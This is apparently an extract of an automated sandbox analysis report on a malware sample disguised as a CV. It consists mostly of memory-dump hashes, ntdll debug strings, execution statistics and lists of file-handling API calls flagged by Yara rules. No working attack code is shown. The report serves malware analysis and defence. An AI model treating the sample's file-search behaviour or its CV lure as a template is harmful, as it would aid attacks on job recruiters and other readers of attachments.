                                                                                                  • Opcode Fuzzy Hash: 5663e0f35f59b4786cff651edfab4e0250af7e9ff0298b75044c79922af63661
                                                                                                  • Instruction Fuzzy Hash: A8E08631401710EEDB312F15DD01F5276E1AF40BB1F205469B142154B1CB7CEC85FA55
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                                                  • Instruction ID: 2b1fa1d42a299caa9f6b3aaa423317754f6c80c97fc09383fc514209aa065136
                                                                                                  • Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                                                  • Instruction Fuzzy Hash: 28E0DF33150A0487C328DE18C41677277A4EB44B20B04823AA61747380C930E804D69A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 9eeef1791f682d1806daff088d782c605668e39cbad21fc7d49dd3969ced6bd8
                                                                                                  • Instruction ID: 5cba84e49fba8578c6e105dfef11d82e7637d23fca8be6789953880a6c04c247
                                                                                                  • Opcode Fuzzy Hash: 9eeef1791f682d1806daff088d782c605668e39cbad21fc7d49dd3969ced6bd8
                                                                                                  • Instruction Fuzzy Hash: 01D05E32501A40AFC7325F0BEE00D13BBF9FBC4B617050A2EA54583920C670EC06DBA0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 5a3d40c4745f6345f33bf01183ce61f2c0162c83d53e40109a16f3db65756406
                                                                                                  • Instruction ID: bfae83f92df120deb212aae5e716c200db816e04cc6e7adc01811bb269a4be2b
                                                                                                  • Opcode Fuzzy Hash: 5a3d40c4745f6345f33bf01183ce61f2c0162c83d53e40109a16f3db65756406
                                                                                                  • Instruction Fuzzy Hash: 92D0A932208610ABC732AA2CFC00FC333E8AB88B62F120459B208C7151C3A8EC81DA80
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 52e1c536986b7be52acab18f0f65ce6b57b56a1f95f795bf6ae5db3b9db2cf4f
                                                                                                  • Instruction ID: 9c432e88d6e56af12ae04dffd3d203501d76b21c2a6fc71748f951632741f52c
                                                                                                  • Opcode Fuzzy Hash: 52e1c536986b7be52acab18f0f65ce6b57b56a1f95f795bf6ae5db3b9db2cf4f
                                                                                                  • Instruction Fuzzy Hash: 63E0EC35A506849FCB22DF5ACA41F9AB7B5BB84B50F190454B5089B661C628ED00DB40
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: cd39b431740b0d27950a5382705b11406bf46ab810de4961f59ef8eab177e8e3
                                                                                                  • Instruction ID: 3f58d3be91d2d1d86757af52a0a49eedb0ea4862dd57ebf11a9bf2d5d2a81250
                                                                                                  • Opcode Fuzzy Hash: cd39b431740b0d27950a5382705b11406bf46ab810de4961f59ef8eab177e8e3
                                                                                                  • Instruction Fuzzy Hash: 85D01273606071A7CB3D6656AD14F6779159B81BB1F1A016D7D0B93900C514CC42F6E1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 5864ed2f3896c9ef293a2b15130b013708e0d33e54b768a67b2e33eeb472f52c
                                                                                                  • Instruction ID: e07583f08deeb8d3d09241dad029f32fe600131368be1c03b97659ce65dbc26a
                                                                                                  • Opcode Fuzzy Hash: 5864ed2f3896c9ef293a2b15130b013708e0d33e54b768a67b2e33eeb472f52c
                                                                                                  • Instruction Fuzzy Hash: E4D012371D054DBBCB119F65DC02F957BA9E794BA0F044020BA04875A1CA3AE950D984
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 51f9009ea6ea77eac28772b2c33c749235058847de315d59bab35fbf77fd7689
                                                                                                  • Instruction ID: 13387d925b735a0ee49d4e9af51dd14b2ba03e56e371185aaf5bfb67235cc9fb
                                                                                                  • Opcode Fuzzy Hash: 51f9009ea6ea77eac28772b2c33c749235058847de315d59bab35fbf77fd7689
                                                                                                  • Instruction Fuzzy Hash: 00D0A730901802EBDF669F01DA00FAD7778EB58780B00005CF60151451D729DD01FE90
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 9a34f73ca023a4a6a785f5d272c303ec3737921b4ae57e2e5ea1d679eb78ef85
                                                                                                  • Instruction ID: 9c8e2795e71bc67a45031f144508a6ce0bbcf30580c97b85487525f1e3693c70
                                                                                                  • Opcode Fuzzy Hash: 9a34f73ca023a4a6a785f5d272c303ec3737921b4ae57e2e5ea1d679eb78ef85
                                                                                                  • Instruction Fuzzy Hash: 32D0C936352D80CFC61ACF0CC894B0573A4BB44F41F850490E801CB722D66CED44CA00
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 8b26b5d956b916a6823f9d5f3f736f76b5a6e9545a82aefec3b8cf0bc66e7001
                                                                                                  • Instruction ID: 60e88eaffac852bd601c6dff512f4ab6d53588e929d915ef376c9cf60335a093
                                                                                                  • Opcode Fuzzy Hash: 8b26b5d956b916a6823f9d5f3f736f76b5a6e9545a82aefec3b8cf0bc66e7001
                                                                                                  • Instruction Fuzzy Hash: F4C08C33290648BFC722EF98CD02F027BA9EB98B40F000021F7048B671C635FD20EA88
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                  • Instruction ID: 512e8e026ae359c8af2d36f224e51848e9c46b4e79a7f3f8304c3b3706e7d271
                                                                                                  • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                  • Instruction Fuzzy Hash: B9D0123610024CEFCB02DF40C854D5A772AFFC8710F108019FD19076118A35ED62DA50
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 8f322a3ca3a75a15032ed1aea1e35d659c770c91524f9ec55eaf48a423b7bcda
                                                                                                  • Instruction ID: 2a5037cc6257e4b153cb220493d8c34df206307a0c19412cf6f7ac5280aa5107
                                                                                                  • Opcode Fuzzy Hash: 8f322a3ca3a75a15032ed1aea1e35d659c770c91524f9ec55eaf48a423b7bcda
                                                                                                  • Instruction Fuzzy Hash: 59C04C357419408FDF15CB19C684F0977E4B764755F1504D0ED05DB721D628ED04DA10
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: e0308ce5ee14c24fb886fb9f14b489cdec504b92c80768c2a23305a5c2b521e7
                                                                                                  • Instruction ID: 0e2a2054ecc089844b20f909399811fbef0f6509e30e802954d6df00424ced27
                                                                                                  • Opcode Fuzzy Hash: e0308ce5ee14c24fb886fb9f14b489cdec504b92c80768c2a23305a5c2b521e7
                                                                                                  • Instruction Fuzzy Hash: 42C02B1F0152C149CD13CF3003123E0BF60CB025D0F1C04C1C0C15F123C0180503D625
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: d6a7e2c2604d17a6bfa047b9f4fbda2068d80fac77509b42c2577b9861e14ffd
                                                                                                  • Instruction ID: dfd7f4b4779cd334dc2dd5ed8a060f470e1587862b59d8600aa5939178e614bd
                                                                                                  • Opcode Fuzzy Hash: d6a7e2c2604d17a6bfa047b9f4fbda2068d80fac77509b42c2577b9861e14ffd
                                                                                                  • Instruction Fuzzy Hash: 2BB01231213945EFC7026724CF41B1832A9BF027C0F0D04B0B60085431DA1C8810E501
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 0a10aa23a146834c08cc05b3c06bfca609ae4a036c6edefc71b9226544336a52
                                                                                                  • Instruction ID: 273a3a1c345eb2daf42ab15c32196ad2208ffacdec4b6423de7745fec065145d
                                                                                                  • Opcode Fuzzy Hash: 0a10aa23a146834c08cc05b3c06bfca609ae4a036c6edefc71b9226544336a52
                                                                                                  • Instruction Fuzzy Hash: 3D90023161540012AA4071584984546400597E2341B91C465E0418554DCE2589577371
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: b871ff3493867f339d83fcf6185366d02a38aa0560d4f508405e8aab9298813f
                                                                                                  • Instruction ID: 0076d3a66b27dd578bccf74df3407dc77f9f1aa388114406b46f36a86cd6b1ec
                                                                                                  • Opcode Fuzzy Hash: b871ff3493867f339d83fcf6185366d02a38aa0560d4f508405e8aab9298813f
                                                                                                  • Instruction Fuzzy Hash: 1C90022131100402EA02615845146060009C7D3385FD1C466E1418555ECA368953B132
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 50f5c59a4f26549ca121211ae8e3871daccd6d90ec5949c564f5c853948091a1
                                                                                                  • Instruction ID: 7432329557aa367a75b1e24db1cd93e56a8d8e031e88fd1e40915d6ae9264ee2
                                                                                                  • Opcode Fuzzy Hash: 50f5c59a4f26549ca121211ae8e3871daccd6d90ec5949c564f5c853948091a1
                                                                                                  • Instruction Fuzzy Hash: B6900221611000425A40716889449064005ABE3351791C575A098C550EC96A88667675
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 44a36cc4f0b39e6ad65216940692e3f3fe952c6b6a037d1b67947aba3cc9b101
                                                                                                  • Instruction ID: 8d4a4f624e9d6d3c4e440b4299187b3ab444d5030c978e38bce65436db8430c5
                                                                                                  • Opcode Fuzzy Hash: 44a36cc4f0b39e6ad65216940692e3f3fe952c6b6a037d1b67947aba3cc9b101
                                                                                                  • Instruction Fuzzy Hash: 7890023121140402EA0061584908747000587D2342F91C465A5158555FCA76C8927531
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: dd10970de3e06cf52dd21cd4462c147bcb50fddb06c1ac43dc5847a8295ec88c
                                                                                                  • Instruction ID: 54d3058c1bf653714e685b85b1a24a779060a53b552f7ac406e3d2b4d903ad9a
                                                                                                  • Opcode Fuzzy Hash: dd10970de3e06cf52dd21cd4462c147bcb50fddb06c1ac43dc5847a8295ec88c
                                                                                                  • Instruction Fuzzy Hash: E190023121140402EA006158491470B000587D2342F91C465A1158555ECA3688527571
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 82372cb6f0a97197022220eb8508f66b794b874da3873bf627f602cdce9246b5
                                                                                                  • Instruction ID: ff4144c839aead76f7f902137d3a11fdffbbaab644178a42903be35084d7be82
                                                                                                  • Opcode Fuzzy Hash: 82372cb6f0a97197022220eb8508f66b794b874da3873bf627f602cdce9246b5
                                                                                                  • Instruction Fuzzy Hash: 2C90026122100042EA0461584504706004587E3341F91C466A2148554DC93A8C627135
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: b707063f1310b843217404cb9e40d1593911dc9ebe3d7f9a02050cecc29a2dae
                                                                                                  • Instruction ID: 596bfb68f7b80cefdfe7b6e6b90cbbfedc95ffee8f00fe987dbe5b7a88c0fcac
                                                                                                  • Opcode Fuzzy Hash: b707063f1310b843217404cb9e40d1593911dc9ebe3d7f9a02050cecc29a2dae
                                                                                                  • Instruction Fuzzy Hash: 3790026135100442EA0061584514B060005C7E3341F91C469E1058554ECA2ACC537136
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: dc1770da7ea0ee5a2a1cdf4e0cacab69775dfdd72e1cf1bcf52aaeaff785f366
                                                                                                  • Instruction ID: b204a7c9781da9d654d9a55e8081bb49dfb6d1fc5c27fd4077607bb0eb6cf41d
                                                                                                  • Opcode Fuzzy Hash: dc1770da7ea0ee5a2a1cdf4e0cacab69775dfdd72e1cf1bcf52aaeaff785f366
                                                                                                  • Instruction Fuzzy Hash: 7C90026121140403EA4065584904607000587D2342F91C465A2058555FCE3A8C527135
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 8ecc3fb07ad44dab34b9313376ae491045cf69f918225503d720feea9388b5e3
                                                                                                  • Instruction ID: ef51a385270ee606b7886511f2cb1850bfdc0781cbb40b68468f58138a38ce36
                                                                                                  • Opcode Fuzzy Hash: 8ecc3fb07ad44dab34b9313376ae491045cf69f918225503d720feea9388b5e3
                                                                                                  • Instruction Fuzzy Hash: DC90022125100802EA40715885147070006C7D2741F91C465A0018554ECA27896676B1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 49fc910bbbf6425e9c75f99977ce43fe5fe6d4668b68cfbb70b9a0e8b20163b7
                                                                                                  • Instruction ID: 9e22747dbbe9bbc21a70149afb0085bd248c91f6f710b9d18cb85b402577bf0b
                                                                                                  • Opcode Fuzzy Hash: 49fc910bbbf6425e9c75f99977ce43fe5fe6d4668b68cfbb70b9a0e8b20163b7
                                                                                                  • Instruction Fuzzy Hash: 9190022121144442EA4062584904B0F410587E3342FD1C46DA414A554DCD2688567731
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 07c65a24e86b7a2a10604b18f9d4b2a068fea720f985e42c4bfb41f81bc43372
                                                                                                  • Instruction ID: 91fd390b63f6eaacb8a702999ea77835cdfbc1c60054a8eb72b09ca43c5c20e3
                                                                                                  • Opcode Fuzzy Hash: 07c65a24e86b7a2a10604b18f9d4b2a068fea720f985e42c4bfb41f81bc43372
                                                                                                  • Instruction Fuzzy Hash: 3890022122180042EB0065684D14B07000587D2343F91C569A0148554DCD2688627531
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 4e0cf3e5cf859019ac6ec0ba7c1997d53d70bb421bf74a666a7baeddf843fd11
                                                                                                  • Instruction ID: 19b64e514c5ef4e077496cda2512402caf1a1731c8c6c003367b9829fb10eb86
                                                                                                  • Opcode Fuzzy Hash: 4e0cf3e5cf859019ac6ec0ba7c1997d53d70bb421bf74a666a7baeddf843fd11
                                                                                                  • Instruction Fuzzy Hash: 4890022125505102EA50715C45046164005A7E2341F91C475A0808594EC96688567231
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 3e442b77793e2f3348072b066e1f2177484894ea668c50fa8e891d46df5edff8
                                                                                                  • Instruction ID: 295eef1ae1a52f1bd2c1c040d1fd7fe45bb40ded1cb9f132f7dacebf5c5fba34
                                                                                                  • Opcode Fuzzy Hash: 3e442b77793e2f3348072b066e1f2177484894ea668c50fa8e891d46df5edff8
                                                                                                  • Instruction Fuzzy Hash: AC90023521100402EE1061585904646004687D2341F91D865A0418558ECA6588A2B131
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 22f3b59f704d842cc23e55c08f3b8620079b7dd876bb518a7cf962d6dcc0014f
                                                                                                  • Instruction ID: 699c59891db6b5643899a754a564b36c9c229338d4b89f122afdb1ba4b643331
                                                                                                  • Opcode Fuzzy Hash: 22f3b59f704d842cc23e55c08f3b8620079b7dd876bb518a7cf962d6dcc0014f
                                                                                                  • Instruction Fuzzy Hash: FC90023121200142AE4062585904A4E410587E3342BD1D869A0009554DCD2588627231
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                  • Instruction ID: 25a299f01f2532d6133b7acd7e0e834de0be6ad5d30a8a2532bc5f3828193302
                                                                                                  • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                  • Instruction Fuzzy Hash:
Strings
• CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00FB4507
• CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00FB4530
• CLIENT(ntdll): Processing section info %ws..., xrefs: 00FB4592
• CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00FB4460
• ExecuteOptions, xrefs: 00FB44AB
• CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 00FB454D
• Execute=1, xrefs: 00FB451E
Memory Dump Source
• Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:2.6%
                                                                                                  Dynamic/Decrypted Code Coverage:4.2%
                                                                                                  Signature Coverage:1.6%
                                                                                                  Total number of Nodes:451
                                                                                                  Total number of Limit Nodes:73

                                                                                                  Control-flow Graph

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33207723172.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_2c50000_netbtugc.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: !$'+$($;a$=5$>P$P_$Q6$]$m!$p$rj$~$4
                                                                                                  • API String ID: 0-4094942991
                                                                                                  • Opcode ID: d9399eb91db57d1fe24d83d058b51ad4fef82593eaf649015a8a75231398c0bd
                                                                                                  • Instruction ID: 419d412eb19c9d96c39a48c15accc88efa487bf306d4ce2eec622e22c305fc75
                                                                                                  • Opcode Fuzzy Hash: d9399eb91db57d1fe24d83d058b51ad4fef82593eaf649015a8a75231398c0bd
                                                                                                  • Instruction Fuzzy Hash: E422BEB0D05229CBDB68CF46C894BEDBBB1BB44308F5081D9C44DAB290DBB59AC9DF44
                                                                                                  APIs
                                                                                                  • FindFirstFileW.KERNELBASE(?,00000000), ref: 02C6C6D1
                                                                                                  • FindNextFileW.KERNELBASE(?,00000010), ref: 02C6C70E
                                                                                                  • FindClose.KERNELBASE(?), ref: 02C6C719
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33207723172.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_2c50000_netbtugc.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Find$File$CloseFirstNext
                                                                                                  • String ID:
                                                                                                  • API String ID: 3541575487-0
                                                                                                  • Opcode ID: e27007db34dca63fa6c18cd996db44c6af8d5fd8d230484b89e2362a9518ca5e
                                                                                                  • Instruction ID: 3751150d441b54c912ced3ff69f34a649fe0669e6f77d12d42d5cd36452c2b63
                                                                                                  • Opcode Fuzzy Hash: e27007db34dca63fa6c18cd996db44c6af8d5fd8d230484b89e2362a9518ca5e
                                                                                                  • Instruction Fuzzy Hash: 5631B8B19402497BDB20DFA0CC89FFF777D9F84745F184569B948A7180DBB0AB849BA0
                                                                                                  APIs
                                                                                                  • NtCreateFile.NTDLL(?,?,?,?,?,?,19868134,?,?,?,?), ref: 02C7913E
